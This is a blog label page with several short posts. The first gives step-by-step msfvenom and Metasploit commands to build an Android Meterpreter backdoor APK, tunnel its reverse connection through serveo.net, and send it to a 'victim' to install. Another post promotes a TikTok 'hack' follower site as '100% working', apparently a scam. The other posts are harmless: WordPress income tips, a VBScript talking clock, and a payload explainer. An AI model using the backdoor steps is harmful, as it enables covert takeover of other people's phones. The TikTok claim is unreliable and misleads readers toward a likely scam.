Showing posts with label make. Show all posts
Showing posts with label make. Show all posts

How to make Payload on Metasploit using Serveo.net Tunnel ?






Step 1  - to Install openssh in termux type this command.

pkg install openssh

Step 2  - Create a private network via serveo (If failed, use another port)

ssh -R (Port-free): localhost: (Port-free) serveo.net

Example [::-  ssh -R 6898: localhost: 6898 serveo.net

Step 3  - Then, proceed with creating an apk. The process is the same as using ngrok, it's just that the host and port are different.

---Command: ---

msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = (PORT_ANDA) R> /sdcard/NAMEAPK.apk

Example [::-    msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 6898 R> /sdcard/backdor.apk

Step 4  - Then let's create a tcp reserve network by entering the command below after  msf>

msf> use exploit / multi / handler
msf> set android payload / meterpreter / reverse_tcp msf
set LHOST localhost msf
set LPORT 6898 (must match the port)
msf> exploit -j -z


* LPORT sets  can be changed according to the port used in the service, for example 8989.1567, or 4444. And remember, it must be the same.

Step 5  - Send the apk that was made to the victim's Android, install it and open it. Then sessions 1 will be made. If it's already made, then enter the command: (make sure sessions one has been confirmed as open)








Enjoy| follow us for more...

How to Hack TikTok within 3 minutes? | Increse your Follower,like and views

I verify this trick, and it’s 100% working. You have to follow some easy steps to get these services:
  1. GoTo https://viptools.es/
  2. Fill captcha for human verification
  3. Choose any tool to get and click on the Use button.
  4. Enter TikTok username
  5. select video
  6. wait 30 seconds.




Enjoy | Follow us for more...

Ways to Make Money with WordPress.

There are many different ways by which you can also earn a living online with it. Have you ever thought of making money using WordPress? If yes, this detailed post is a treat for you

1. Creating and Selling Plugins

Be aware of one thing that you can’t run your blog without using at least a few plugins, Everyone uses plugins to add extra features. There are thousands of plugins available in WordPress – some of them are absolutely free.
If you find a solution of any problem and create a plugin for it (that WordPress users might be interested in buying), there’s absolutely nothing that can stop you from making passive income from it. Analyze a few existing plugins that are making decent money and figure out how you can do the same to create a constant cash flow like Pippins Plugins or OptinMonster. Plus the plugin developer monetized their creation by release a premium version with more advanced features.
You can sell your WordPress plugins at CodeCanyon. You may also sell it from your own blog, or by creating a separate site for it. You can also make money by working on custom plugin projects. You will find such projects on freelancing sites like Freelancer, Elance, Odesk, etc.

2. Develop WordPress Themes

There are so many companies which are designing fantastic themes for WordPress sites to make passive income streams. For instance, people like Brain Clark and Chris Pearson founded StudioPress and Thesis respectively to build quality and appealing themes for WordPress websites. you may also work on custom WordPress theme projects for clients to make some extra dollars.
You may sell your WordPress themes at Template Monster, Themeforest, Creative Market, or you can sell them from your own website. Just like plugins

3. Offer WordPress Consulting Services

One of the easiest ways to make money online using WordPress is the offer consulting services. It can be done easily only if you are good on WordPress : be it creating customized designs for clients, or teaching WordPress to beginners or advanced users.
Make sure you have a great portfolio if you are thinking of making a passive income stream by using this method. One of the easiest ways to build a great portfolio to increase your income is to offer your consulting services (or select products you’ve created) for free to some of the top influential bloggers in the WordPress community. Ask them to give feedback if they are satisfied with your work or to share a review of your services on their blog. This can really boost your online sales, as testimonials from top bloggers is great social proof.

4. Blog Setup Service

Are you a beginner or a part time blogger who doesn’t have much WordPress skills even though you want to make money using WordPress? If yes, a blog set up service is the perfect option for you.  Your task as a blog setup service provider will be to install WordPress, upload a WordPress theme, add the recommended plugins, etc.
To get clients , create a blog setup service page on your blog. Attract few dedicated traffic to that page, either by adding banners for your service on your own site, guest blogging or by paid advertising. Social Media works as well. If people are interested in your offer, they’ll contact you. But many new bloggers won’t want to pay. You can provide blog setup services for free, but you’ll have to rely on affiliate links within your services page

5. Content Writing Service

Do you have the skills to write well? Yes! Start offering WordPress content writing service. You may find WordPress content writing jobs at ProBlogger Job Board, Elance, Odesk, peopleperhour, etc. Or just visit your favorite online blogs – many have contributor application pages where you can submit your articles and get paid for them. So not only will you get some awesome backlinks from top ranking sites, but you can get paid for your hard work.

6. Start Your Own Website

Launch your own WordPress related blog and start making money. You can create a dedicated services page and offer what all you can do for your clients. Clearly mention your previous work in the portfolio, and include few testimonials. Try to engage with influential bloggers to create a thriving network around your blog to get more clients.
Not sure how to get started with your WordPress website? Checkout complete beginner’s guide to WordPress series from google search where you can learn all the steps of building a website including hosting, posts & pages, plugins, contact forms and more.

8. Monetize Your Blog

You can make money using affiliate marketing, selling ads, sponsored reviews, etc from your blog. This requires no additional effort from you – it’s simply a way to take full advantage of the content and traffic you already have. Most marketplaces and service providers offer affiliate programs. Some of our favorites that are easy to work with include Themeforest, Shareasale, CJ Affiliate and Creative Market. Just signup for a FREE account and add links to you posts where it feels natural.
To sell ads you can offer your own ad packages or work through a company like BuySellAds. Or signup for a Google Adsense account and insert your code to let Google’s network handle the ads while you get a nice little check each month.




Enjoy | Follow us for more...

How to make your windows to speak ?

First of all -


Create new notepad file.

Copy below code and paste on notepad file.
Set Sapi = Wscript.CreateObject("SAPI.SpVoice")

dim str

if hour(time) < 12 then
Sapi.speak " good morning Shivam"
else
if hour(time) > 12 then
if hour(time) > 16 then
Sapi.speak "Good evening Shivam"
else
Sapi.speak "Good afternoon User"
end if
end if
end if

Sapi.speak "The current time is "

if hour(time) > 12 then
Sapi.speak hour(time)-12
else
if hour(time) = 0 then
Sapi.speak "12"
else
Sapi.speak hour(time)
end if
end if


if minute(time) < 10 then
Sapi.speak "o"
if minute(time) < 1 then
Sapi.speak "clock"
else
Sapi.speak minute(time)
end if
else
Sapi.speak minute(time)
end if

if hour(time) > 12 then
Sapi.speak "P.M."
else
if hour(time) = 0 then
if minute(time) = 0 then
Sapi.speak "Midnight"
else
Sapi.speak "A.M."
end if
else
if hour(time) = 12 then
if minute(time) = 0 then
Sapi.speak "Noon"
else
Sapi.speak "P.M."
end if
else
Sapi.speak "A.M."
end if
end if
end if


Now save this file with .vbs 

Run the same.







Enjoy. Follow us for more... 

What is a payload?











What is a payload?

Payload is delivered by exploit and is used to control the remote system.Think of it this way: Exploit is like terrorist that is carrying a bomb in his backpack. He enters the system and leaves his backpack there. Most popular and widely known payload is meterpreter, that has a lot of features. With it you can Browse remote files, downlaod them, upload your own, capture keystrokes, take screenshots, open DOS, and pivot to another machine as well. Through meterpreter, you can pivot and attack machines in networks that are not your own.





How to set-up a Flex project in Flash Builder 4.5.mp4

  Download :  How to set-up a Flex project in Flash Builder 4.5.mp4 How to Set-Up a Flex Project in Flash Builder 4.5 (Beginner Friendly Gui...